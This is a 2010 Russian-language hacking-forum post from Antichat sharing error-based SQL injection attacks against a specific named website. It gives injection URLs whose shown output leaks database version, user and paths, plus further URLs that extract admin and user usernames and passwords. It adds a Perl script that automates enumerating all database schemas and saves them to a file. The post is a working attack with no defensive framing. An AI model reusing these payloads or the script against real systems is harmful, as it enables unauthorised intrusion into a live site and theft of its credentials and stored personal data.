28.05.2010, 15:25
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+unio n+select+2+union+select+3)x+group+by+concat((SELEC T+concat_ws(':',version(),database(),user(),@@vers ion_compile_os,@@tmpdir,@@datadir)),floor(rand(0)* 2)))--+
5.0.77-community-nt:mostwanted:globaluname@localhost:Win32:C:\WI...
>400 БД
> 40 таблиц tbladminuser
http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+unio n+select+2+union+select+3)x+group+by+concat((SELEC T+concat_ws(':',username,password)+FROM+seodata.ad min+limit+0,1),floor(rand(0)*2)))--+
http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+unio n+select+2+union+select+3)x+group+by+concat((SELEC T+concat_ws(':',loginname,pass,admin)+FROM+resumex .users+limit+0,1),floor(rand(0)*2)))--+
в подарочек:
PHP код:
#!/usr/bin/perl -w
# target
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
#my $proxy="http://xxx.xxx.xxx.xxx:port";
#$ua->proxy(['http','https'],$proxy);
my $i=0;
while(1)
{
my $req = HTTP::Request->new(GET => "http://www.sex-offenders.info/detail.php?id=(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+SCHEMA_NAME+FROM+information_schema.SCHEMATA+limit+$i,1),floor(rand(0)*2)))--+");
my $res = $ua->request($req);
if ($res->as_string =~ /Duplicate entry(.+)for/)
{
open(FILE,'>>results.txt');
print "print $i: $1\n";
print FILE "$1\n";
close(FILE);
$i++;
}
else {last;}
}
Последний раз редактировалось Strilo4ka; 28.05.2010 в 15:38..
|
|
|